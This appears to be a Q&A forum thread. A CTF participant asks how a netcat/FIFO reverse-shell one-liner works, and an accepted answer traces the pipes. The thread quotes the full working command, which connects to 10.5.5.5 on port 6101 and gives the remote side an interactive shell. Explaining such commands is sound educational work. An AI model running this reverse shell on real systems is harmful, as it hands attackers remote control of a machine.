# What is this code actually doing?

Tags: pipe, fifo, nc

While doing a CTF challenge on a platform, I needed a reverse shell but couldn't get one working so I looked at the processes and found one reverse shell code:

```bash
rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2>&1|nc 10.5.5.5 6101 >/tmp/m
```

Which actually worked but I can't actually understand how the pipes are working, where is it sending data to, etc. Can someone please explain this?

Answer (score 4, accepted):

This sets up a remotely-controlled shell on the system. The inputs and outputs are as follows:

- `cat /tmp/m` reads from the `/tmp/m` FIFO and writes it to ...
- `|/bin/sh -i 2>&1` which executes the commands it reads and sends its output (both standard output and standard error) to ...
- `|nc 10.5.5.5 6101` which connects to 10.5.5.5:6101 and writes to
- `>/tmp/m` the FIFO.

Thus the remote system can feed commands, which are transmitted through `nc`, written to the FIFO, read by `cat`, interpreted by `sh`, and the output of those commands is sent back to the remote system through `nc`.

Comment: Isn't tmp/m initially empty? What is it reading then?

Comment: Yes, it’s initially empty; it reads whatever is sent over the network.